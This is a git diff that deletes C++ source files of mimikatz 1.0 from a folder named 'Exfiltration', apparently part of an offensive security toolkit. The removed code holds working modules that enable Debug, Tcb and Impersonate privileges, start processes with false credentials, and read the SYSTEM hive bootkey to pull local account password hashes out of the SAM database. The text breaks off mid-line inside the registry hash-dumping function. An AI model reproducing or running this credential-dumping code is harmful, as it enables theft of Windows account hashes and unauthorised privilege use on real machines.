a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.h deleted file mode 100644 index c96e22f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.h +++ /dev/null @@ -1,30 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_patch.h" -#include <iostream> - -class mod_mimikatz_nogpo -{ -private: - static bool disableSimple(wstring commandLine, wstring origKey, wstring kiwiKey, DWORD * monPID = NULL); - static bool disableSimple(wstring commandLine, string origKey, string kiwiKey, DWORD * monPID = NULL); - static bool disableSimple(wstring commandLine, SIZE_T taillePattern, PBYTE maCleDeDepart, const void * maCleFinale, DWORD * monPID = NULL); - - static bool getApplicationPathFromCLSID(wstring application, wstring * path); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool regedit(vector<wstring> * arguments); - static bool cmd(vector<wstring> * arguments); - static bool taskmgr(vector<wstring> * arguments); - static bool olpst(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp deleted file mode 100644 index 1b29486..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.cpp +++ /dev/null @@ -1,167 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_privilege.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_privilege::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les privilges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(enable, L"enable", L"Active un ou plusieurs privilges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(remove, L"remove", L"Retire un ou plusieurs privilges")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(disable, L"disable", L"Dsactive un ou plusieurs privilges")); - /* Raccouris */ - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(debug, L"debug", L"Demande (ou dsactive) le privilge Debug")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(security, L"security", L"Demande (ou dsactive) le privilge Security")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(tcb, L"tcb", L"Demande (ou dsactive) le privilge Tcb")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(impersonate, L"impersonate", L"Demande (ou dsactive) le privilge Impersonate")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(assign, L"assign", L"Demande (ou dsactive) le privilge AssignPrimaryToken")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(shutdown, L"shutdown", L"Demande (ou dsactive) le privilge Shutdown")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(takeowner, L"takeowner", L"Demande (ou dsactive) le privilge TakeOwnership")); - return monVector; -} - -bool mod_mimikatz_privilege::enable(vector<wstring> * arguments) -{ - bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_ENABLED); - return true; -} - -bool mod_mimikatz_privilege::remove(vector<wstring> * arguments) -{ - bool reussite = multiplePrivs(arguments, SE_PRIVILEGE_REMOVED); - return true; -} - -bool mod_mimikatz_privilege::disable(vector<wstring> * arguments) -{ - bool reussite = multiplePrivs(arguments, 0); - return true; -} - -bool mod_mimikatz_privilege::simplePriv(wstring priv, vector<wstring> * arguments) -{ - bool ajout = arguments->empty(); - - (*outputStream) << L"Demande d" << (ajout ? L"\'ACTIVATION" : L"e RETRAIT") << L" du privilge : " << priv << L" : "; - - vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>; - mesPrivs->push_back(make_pair(priv, ajout ? SE_PRIVILEGE_ENABLED : 0)); - - bool reussite = mod_privilege::set(mesPrivs);//, INVALID_HANDLE_VALUE); - delete mesPrivs; - - if(reussite) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return reussite; -} - -bool mod_mimikatz_privilege::multiplePrivs(vector<wstring> * privs, DWORD type) -{ - bool reussite = false; - vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>; - for(vector<wstring>::iterator monPrivilege = privs->begin(); monPrivilege != privs->end() ; monPrivilege++) - { - mesPrivs->push_back(make_pair(*monPrivilege, type)); - } - reussite = mod_privilege::set(mesPrivs); - delete mesPrivs; - - if(reussite) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return reussite; -} - - -bool mod_mimikatz_privilege::list(vector<wstring> * arguments) -{ - vector<pair<wstring, DWORD>> * mesPrivs = new vector<pair<wstring, DWORD>>; - - if(mod_privilege::get(mesPrivs))//, INVALID_HANDLE_VALUE)) - { - for(vector<pair<wstring, DWORD>>::iterator monPrivilege = mesPrivs->begin(); (monPrivilege != mesPrivs->end()) ; monPrivilege++) - { - (*outputStream) << setw(35) << setfill(wchar_t(L' ')) << left << monPrivilege->first << right << L'\t'; - - if(monPrivilege->second & SE_PRIVILEGE_VALID_ATTRIBUTES) - { - if(monPrivilege->second & SE_PRIVILEGE_ENABLED_BY_DEFAULT) - { - (*outputStream) << L"ENABLED_BY_DEFAULT "; - } - - if(monPrivilege->second & SE_PRIVILEGE_ENABLED) - { - (*outputStream) << L"ENABLED "; - } - - if(monPrivilege->second & SE_PRIVILEGE_REMOVED) - { - (*outputStream) << L"REMOVED "; - } - - if(monPrivilege->second & SE_PRIVILEGE_USED_FOR_ACCESS) - { - (*outputStream) << L"USED_FOR_ACCESS "; - } - - if(monPrivilege->second & SE_PRIVILEGE_REMOVED) - { - (*outputStream) << L"REMOVED"; - } - } - - (*outputStream) << endl; - } - } - else (*outputStream) << mod_system::getWinError() << endl; - - return true; -} - - -bool mod_mimikatz_privilege::debug(vector<wstring> * arguments) -{ - simplePriv(SE_DEBUG_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::security(vector<wstring> * arguments) -{ - simplePriv(SE_SECURITY_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::tcb(vector<wstring> * arguments) -{ - simplePriv(SE_TCB_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::impersonate(vector<wstring> * arguments) -{ - simplePriv(SE_IMPERSONATE_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::assign(vector<wstring> * arguments) -{ - simplePriv(SE_ASSIGNPRIMARYTOKEN_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::shutdown(vector<wstring> * arguments) -{ - simplePriv(SE_SHUTDOWN_NAME, arguments); return true; -} - -bool mod_mimikatz_privilege::takeowner(vector<wstring> * arguments) -{ - simplePriv(SE_TAKE_OWNERSHIP_NAME, arguments); return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.h deleted file mode 100644 index f3dc739..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_privilege.h +++ /dev/null @@ -1,33 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_privilege.h" -#include <iostream> - -class mod_mimikatz_privilege -{ -private: - static bool multiplePrivs(vector<wstring> * privs, DWORD type); - static bool simplePriv(wstring priv, vector<wstring> * arguments); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - static bool enable(vector<wstring> * arguments); - static bool remove(vector<wstring> * arguments); - static bool disable(vector<wstring> * arguments); - - static bool debug(vector<wstring> * arguments); - static bool security(vector<wstring> * arguments); - static bool tcb(vector<wstring> * arguments); - static bool impersonate(vector<wstring> * arguments); - static bool assign(vector<wstring> * arguments); - static bool shutdown(vector<wstring> * arguments); - static bool takeowner(vector<wstring> * arguments); - -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.cpp deleted file mode 100644 index d18ca8b..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.cpp +++ /dev/null @@ -1,298 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_process.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_process::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(start, L"start", L"Excute un processus, /paused et/ou /sudo")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(suspend, L"suspend", L"Suspend l\'excution d\'un processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(resume, L"resume", L"Reprend un processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Stoppe un (ou plusieurs) processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(modules, L"modules", L"Liste les modules (pour le moment du PID courant)")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(iat, L"iat", L"Liste la table d\'adressage")); - return monVector; -} - -bool mod_mimikatz_process::start(vector<wstring> * arguments) -{ - if(!arguments->empty()) - { - wstring commande = arguments->back(); - bool paused = false; - bool sudo = false; - - (*outputStream) << L"Demande d\'excution de : \'" << commande << L"'" << endl; - PROCESS_INFORMATION pi = {INVALID_HANDLE_VALUE, INVALID_HANDLE_VALUE, 0, 0}; - - switch(arguments->size()) - { - case 2: - if(_wcsicmp(arguments->front().c_str(), L"/paused") == 0) - paused = true; - else if(_wcsicmp(arguments->front().c_str(), L"/sudo") == 0) - sudo = true; - else - goto doStartProcess_syntaxerror; - - break; - case 3: - if(_wcsicmp(arguments->front().c_str(), L"/paused") == 0) - paused = true; - else - goto doStartProcess_syntaxerror; - - if(_wcsicmp(arguments->at(1).c_str(), L"/sudo") == 0) - sudo = true; - else - goto doStartProcess_syntaxerror; - - break; - } - - if(mod_process::start(&commande, &pi, paused, sudo)) - { - if(paused) - (*outputStream) << L" * Le Thread principal est suspendu ! Reprise avec : thread::resume " << pi.dwThreadId << endl; - - if(sudo) - (*outputStream) << L" * Le processus est dmarr avec de fausses donnes d\'identification" << endl; - - printInfosFromPid(pi.dwProcessId, pi.dwThreadId); - } - else (*outputStream) << L"mod_process::start ; " << mod_system::getWinError() << endl; - } - else - { -doStartProcess_syntaxerror: - (*outputStream) << L"Erreur de syntaxe ; " << L"process::start [/paused] [/sudo] commande" << endl; - } - - return true; -} - -bool mod_mimikatz_process::stop(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring procName = *monProcessName; - - if(mod_process::getUniqueForName(&monProcess, &procName)) - { - (*outputStream) << L"Fin de : " << procName << L'\t'; - if(mod_process::stop(monProcess.th32ProcessID)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_process::stop ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - } - - return true; -} - - -bool mod_mimikatz_process::suspend(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring procName = *monProcessName; - - if(mod_process::getUniqueForName(&monProcess, &procName)) - { - (*outputStream) << L"Suspension de : " << procName << L'\t'; - if(mod_process::suspend(monProcess.th32ProcessID)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_process::suspend ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - } - - return true; -} - - -bool mod_mimikatz_process::resume(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monProcessName = arguments->begin(); monProcessName != arguments->end(); monProcessName++) - { - mod_process::KIWI_PROCESSENTRY32 monProcess; - wstring procName = *monProcessName; - - if(mod_process::getUniqueForName(&monProcess, &procName)) - { - (*outputStream) << L"Reprise de : " << procName << L'\t'; - if(mod_process::resume(monProcess.th32ProcessID)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_process::resume ; " << mod_system::getWinError(); - (*outputStream) << endl; - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - } - - return true; -} - - - - -bool mod_mimikatz_process::list(vector<wstring> * arguments) -{ - vector<mod_process::KIWI_PROCESSENTRY32> * vectorProcess = new vector<mod_process::KIWI_PROCESSENTRY32>(); - if(mod_process::getList(vectorProcess)) - { - (*outputStream) << L"PID\tPPID\t#Ths\tpri\timage" << endl; - for(vector<mod_process::KIWI_PROCESSENTRY32>::iterator monProcess = vectorProcess->begin(); monProcess != vectorProcess->end(); monProcess++) - { - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monProcess->th32ProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->th32ParentProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->cntThreads << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monProcess->pcPriClassBase << L'\t' << - monProcess->szExeFile << - endl; - } - } - else (*outputStream) << L"mod_process::getList ; " << mod_system::getWinError() << endl; - - delete vectorProcess; - return true; -} - -bool mod_mimikatz_process::modules(vector<wstring> * arguments) -{ - DWORD processId = 0 ; - - if(!arguments->empty() && !(arguments->size() > 1)) - { - wstringstream monBuffer; - monBuffer << arguments->front(); - monBuffer >> processId; - } - - vector<mod_process::KIWI_MODULEENTRY32> * vectorModules = new vector<mod_process::KIWI_MODULEENTRY32>(); - if(mod_process::getModulesListForProcessId(vectorModules, &processId)) - { - (*outputStream) << L"@Base\tTaille\tModule\tPath" << endl; - for(vector<mod_process::KIWI_MODULEENTRY32>::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++) - { - (*outputStream) << monModule->modBaseAddr << L'\t' << monModule->modBaseSize << '\t' << monModule->szModule << L'\t' << monModule->szExePath << endl; - } - } - else - (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; - - delete vectorModules; - return true; -} - -bool mod_mimikatz_process::iat(vector<wstring> * arguments) -{ - wstring process; - wstring module; - - switch(arguments->size()) - { - case 2: - process = arguments->at(0); - module = arguments->at(1); - break; - case 1: - process = arguments->at(0); - break; - default: - ; - } - - mod_process::KIWI_PROCESSENTRY32 monProcess; - if(mod_process::getUniqueForName(&monProcess, &process)) - { - if(HANDLE monHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, monProcess.th32ProcessID)) - { - if(module.empty() || (module.front() != L'*')) - { - if(module.empty()) - module.assign(process); - - mod_process::KIWI_MODULEENTRY32 * monModule = new mod_process::KIWI_MODULEENTRY32(); - if(mod_process::getUniqueModuleForName(monModule, &module, &monProcess.th32ProcessID)) - { - printIATFromModule(monModule, monHandle); - } - else (*outputStream) << L"mod_process::getUniqueModuleForName ; " << mod_system::getWinError() << endl; - delete monModule; - } - else - { - vector<mod_process::KIWI_MODULEENTRY32> * vectorModules = new vector<mod_process::KIWI_MODULEENTRY32>(); - if(mod_process::getModulesListForProcessId(vectorModules, &monProcess.th32ProcessID)) - { - for(vector<mod_process::KIWI_MODULEENTRY32>::iterator monModule = vectorModules->begin(); monModule != vectorModules->end(); monModule++) - printIATFromModule(&*monModule, monHandle); - } - else (*outputStream) << L"mod_process::getModulesListForProcessId ; " << mod_system::getWinError() << endl; - - delete vectorModules; - } - - CloseHandle(monHandle); - } - } - else (*outputStream) << L"mod_process::getUniqueForName ; " << mod_system::getWinError() << endl; - - return true; -} - -void mod_mimikatz_process::printInfosFromPid(DWORD &PID, DWORD ThreadId) -{ - (*outputStream) << L"PID : " << PID << endl; - - if(ThreadId) - { - (*outputStream) << L"ThreadID : " << ThreadId << endl; - } - - LUID monId = {0, 0}; - if(mod_process::getAuthentificationIdFromProcessId(PID, monId)) - { - (*outputStream) << "AuthId_h : " << monId.HighPart << endl; - (*outputStream) << "AuthId_l : " << monId.LowPart << endl; - } - else (*outputStream) << L"Erreur : " << mod_system::getWinError() << endl; -} - -void mod_mimikatz_process::printIATFromModule(mod_process::KIWI_MODULEENTRY32 * monModule, HANDLE monHandle) -{ - (*outputStream) << monModule->szModule << L" -> " << monModule->szExePath << endl; - PBYTE baseAddr = reinterpret_cast<PBYTE>(monModule->modBaseAddr); - - vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>> * monIAT = new vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>>(); - if(mod_process::getIAT(baseAddr, monIAT, monHandle)) - { - for(vector<pair<string, vector<mod_process::KIWI_IAT_MODULE>>>::iterator monModuleImporte = monIAT->begin(); monModuleImporte != monIAT->end(); monModuleImporte++) - { - (*outputStream) << L" - Imports depuis : " << monModuleImporte->first.c_str() << endl; - for(vector<mod_process::KIWI_IAT_MODULE>::iterator maFonctionImporte = monModuleImporte->second.begin(); maFonctionImporte != monModuleImporte->second.end(); maFonctionImporte++) - { - (*outputStream) << L" " << maFonctionImporte->ptrToFunc << L" -> " << maFonctionImporte->ptrFunc << L' '; - if(maFonctionImporte->Ordinal != 0) - (*outputStream) << L"O# " << maFonctionImporte->Ordinal; - else - (*outputStream) << maFonctionImporte->funcName.c_str(); - (*outputStream) << endl; - } - } - } - delete monIAT; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.h deleted file mode 100644 index 68f8428..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_process.h +++ /dev/null @@ -1,32 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include <iostream> - -class mod_mimikatz_process -{ -private: - static void printInfosFromPid(DWORD &PID, DWORD ThreadId); - static void printIATFromModule(mod_process::KIWI_MODULEENTRY32 * monModule, HANDLE monHandle = INVALID_HANDLE_VALUE); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - - static bool start(vector<wstring> * arguments); - static bool suspend(vector<wstring> * arguments); - static bool resume(vector<wstring> * arguments); - static bool stop(vector<wstring> * arguments); - - - static bool modules(vector<wstring> * arguments); - static bool iat(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.cpp deleted file mode 100644 index 26f5798..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_samdump.cpp +++ /dev/null @@ -1,353 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_samdump.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_samdump::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(full, L"hashes", L"Rcupre la bootkey depuis une ruche SYSTEM puis les hashes depuis une ruche SAM")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(bootkey, L"bootkey", L"Rcupre la bootkey depuis une ruche SYSTEM")); - return monVector; -} - -bool mod_mimikatz_samdump::bootkey(vector<wstring> * arguments) -{ - unsigned char bootkey[0x10]; - if(!arguments->empty()) - getInfosFromHive(arguments->front(), bootkey); - else - getInfosFromReg(bootkey); - return true; -} - -bool mod_mimikatz_samdump::full(vector<wstring> * arguments) -{ - unsigned char bootkey[0x10]; - if(!arguments->empty() && (arguments->size() >= 1 && arguments->size() <= 2)) - { - if(getInfosFromHive(arguments->front().c_str(), bootkey)) - { - if(!getUsersAndHashesFromHive(arguments->back().c_str(), bootkey)) - (*outputStream) << L"Erreur lors de l\'exploration des ruches" << endl; - } - } - else - { - if(getInfosFromReg(bootkey)) - { - if(!getUsersAndHashesFromReg(bootkey)) - (*outputStream) << L"Erreur lors de l\'exploration du registre" << endl; - } - } - return true; -} - -bool mod_mimikatz_samdump::getUsersAndHashesFromHive(wstring samHive, unsigned char bootkey[0x10]) -{ - bool reussite = false; - - mod_hive::hive * monHive = new mod_hive::hive(); - mod_hive::InitHive(monHive); - if(mod_hive::RegOpenHive(samHive.c_str(), monHive)) - { - string * rootKey = new string(); - if(mod_hive::RegGetRootKey(monHive, rootKey)) - { - string * keyAccountName = new string(*rootKey); keyAccountName->append("\\SAM\\Domains\\Account"); - string * valAccountName = new string("F"); - int longueurF = 0; unsigned char *bufferF = NULL; - - if(mod_hive::RegOpenKeyQueryValue(monHive, keyAccountName, valAccountName, &bufferF, &longueurF)) - { - BYTE hBootKey[0x20] = {0}; - if(mod_hash::getHbootKeyFromBootKeyAndF(hBootKey, bootkey, bufferF)) - { - string * keyUsers = new string(*rootKey); keyUsers->append("\\SAM\\Domains\\Account\\Users"); - mod_hive::nk_hdr * nodeUsers = new mod_hive::nk_hdr(); - if(mod_hive::RegOpenKey(monHive, keyUsers, &nodeUsers )) - { - vector<string> * keyNames = new vector<string>(); - if(reussite = mod_hive::RegEnumKey(monHive, nodeUsers, keyNames)) - { - for(vector<string>::iterator maKey = keyNames->begin(); maKey != keyNames->end(); maKey++) - { - if(maKey->compare("Names") != 0) - { - string * keyUser = new string(*keyUsers); keyUser->append("\\"); keyUser->append(*maKey); - string valUserF = "F"; mod_hash::USER_F * userF = NULL; int longueurF = 0; - string valUserV = "V"; mod_hash::USER_V * userV = NULL; int longueurV = 0; - - if(reussite &= mod_hive::RegOpenKeyQueryValue(monHive, keyUser, &valUserV, reinterpret_cast<unsigned char **>(&userV), &longueurV) && - mod_hive::RegOpenKeyQueryValue(monHive, keyUser, &valUserF, reinterpret_cast<unsigned char **>(&userF), &longueurF)) - { - infosFromUserAndKey(userF, userV, hBootKey); - delete[] userF, userV; - } - delete keyUser; - } - } - } - delete keyNames; - } - delete nodeUsers, keyUsers; - } - delete[] bufferF; - } - delete valAccountName, keyAccountName; - } - delete rootKey; - } - delete monHive; - - return reussite; -} - -bool mod_mimikatz_samdump::getInfosFromHive(wstring systemHive, unsigned char bootkey[0x10]) -{ - bool reussite = false; - - mod_hive::hive * monHive = new mod_hive::hive(); - mod_hive::InitHive(monHive); - - if(mod_hive::RegOpenHive(systemHive.c_str(), monHive)) - { - string * rootKey = new string(); - if(mod_hive::RegGetRootKey(monHive, rootKey)) - { - DWORD nControlSet = 0; - if(getNControlSetFromHive(monHive, rootKey, &nControlSet)) - { - stringstream * monControlSet = new stringstream; - *monControlSet << *rootKey << "\\ControlSet" << setw(3) << setfill('0') << nControlSet; - string * fullControlSet = new string(monControlSet->str()); - delete monControlSet; - - wstring * computerName = new wstring(); - if(getComputerNameFromHive(monHive, fullControlSet, computerName)) - (*outputStream) << L"Ordinateur : " << *computerName << endl; - delete computerName; - - if(reussite = getBootKeyFromHive(monHive, fullControlSet, bootkey)) - (*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; - delete fullControlSet; - } - } - delete rootKey; - mod_hive::RegCloseHive(monHive); - } - delete monHive; - - return reussite; -} - -bool mod_mimikatz_samdump::getComputerNameFromHive(mod_hive::hive * theHive, string * fullControlSet, wstring * computerName) -{ - bool reussite = false; - - string * keyComputerName = new string(*fullControlSet); keyComputerName->append("\\Control\\ComputerName\\ComputerName"); - string * valComputerName = new string("ComputerName"); - int longueur = 0; unsigned char *buffer = NULL; - if(reussite = mod_hive::RegOpenKeyQueryValue(theHive, keyComputerName, valComputerName, &buffer, &longueur)) - { - computerName->assign(reinterpret_cast<wchar_t *>(buffer), longueur / sizeof(wchar_t)); - delete[] buffer; - } - delete valComputerName; - delete keyComputerName; - - return reussite; -} - -bool mod_mimikatz_samdump::getBootKeyFromHive(mod_hive::hive * theHive, string * fullControlSet, unsigned char bootkey[0x10]) -{ - bool reussite = false; - - unsigned char key[0x10]; - char *kn[] = {"JD", "Skew1", "GBG", "Data"}; - - for(unsigned int i = 0; i < sizeof(kn) / sizeof(char *); i++ ) - { - string * maKey = new string(*fullControlSet); maKey->append("\\Control\\Lsa\\"); maKey->append(kn[i]); - mod_hive::nk_hdr * n = new mod_hive::nk_hdr(); - - if(reussite = mod_hive::RegOpenKey(theHive, maKey, &n)) - { - char kv[9] = {0}; - unsigned char *b = mod_hive::read_data(theHive, n->classname_off + 0x1000); - for(short j = 0; j < (n->classname_len / 2) && j < 8; j++) - kv[j] = b[j*2]; - sscanf_s(kv, "%x", (unsigned int*) (&key[i*4])); - } - delete n, maKey; - } - - if(reussite) - mod_hash::getBootKeyFromKey(bootkey, key); - - return reussite; -} - -bool mod_mimikatz_samdump::getBootKeyFromReg(BYTE bootkey[0x10]) -{ - bool reussite = false; - - DWORD code; - BYTE key[0x10] = {0}; - wchar_t * kn[] = {L"JD", L"Skew1", L"GBG", L"Data"}; - HKEY monLSA; - code = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 0, KEY_READ, &monLSA); - if(code == ERROR_SUCCESS) - { - for(unsigned int i = 0; (i < sizeof(kn) / sizeof(wchar_t *)) && (code == ERROR_SUCCESS); i++ ) - { - HKEY monSecret; - code = RegOpenKeyEx(monLSA, kn[i], 0, KEY_READ, &monSecret); - if(code == ERROR_SUCCESS) - { - wchar_t monBuffer[8 + 1]; - DWORD maTaille = 8 + 1; - - code = RegQueryInfoKey(monSecret, monBuffer, &maTaille, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL); - if(code == ERROR_SUCCESS) - swscanf_s(monBuffer, L"%x", (DWORD *) (&key[i * sizeof(DWORD)])); - else (*outputStream) << L"RegQueryInfoKey " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; - RegCloseKey(monSecret); - } else (*outputStream) << L"RegOpenKeyEx " << kn[i] << " : " << mod_system::getWinError(false, code) << endl; - } - RegCloseKey(monLSA); - } else (*outputStream) << L"RegOpenKeyEx LSA : " << mod_system::getWinError(false, code) << endl; - - if(reussite = (code == ERROR_SUCCESS)) - mod_hash::getBootKeyFromKey(bootkey, key); - - return reussite; -} - - - -bool mod_mimikatz_samdump::getNControlSetFromHive(mod_hive::hive * theHive, string * rootKey, DWORD * nControlSet) -{ - bool reussite = false; - - string * selectKey = new string(*rootKey); selectKey->append("\\Select"); - string * nDefault = new string("Default"); - int longueur = 0; unsigned char *buffer = NULL; - - if(mod_hive::RegOpenKeyQueryValue(theHive, selectKey, nDefault, &buffer, &longueur)) - { - if(reussite = (longueur == sizeof(DWORD))) - *nControlSet = *(DWORD *) (buffer); - delete[] buffer; - } - - delete nDefault, selectKey; - return reussite; -} - -bool mod_mimikatz_samdump::getInfosFromReg(BYTE bootkey[0x10]) -{ - bool reussite = false; - - wstring * computerName = new wstring(); - if(mod_system::getComputerName(computerName)) - (*outputStream) << L"Ordinateur : " << *computerName << endl; - delete computerName; - - if(reussite = getBootKeyFromReg(bootkey)) - (*outputStream) << L"BootKey : " << mod_text::stringOfHex(bootkey, 0x10) << endl; - - return reussite; -} - - -bool mod_mimikatz_samdump::getUsersAndHashesFromReg(BYTE bootkey[0x10]) -{ - bool reussite = false; - - DWORD code; - HKEY maSAM; - code = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SAM\\SAM\\Domains\\Account", 0, KEY_READ, &maSAM); - if(code == ERROR_SUCCESS) - { - DWORD tailleRequise = 0; - code = RegQueryValueEx(maSAM, L"F", NULL, NULL, NULL, &tailleRequise); - if(code == ERROR_SUCCESS) - { - BYTE * bufferF = new BYTE[tailleRequise]; - code = RegQueryValueEx(maSAM, L"F", NULL, NULL, bufferF, &tailleRequise); - if(code == ERROR_SUCCESS) - { - BYTE 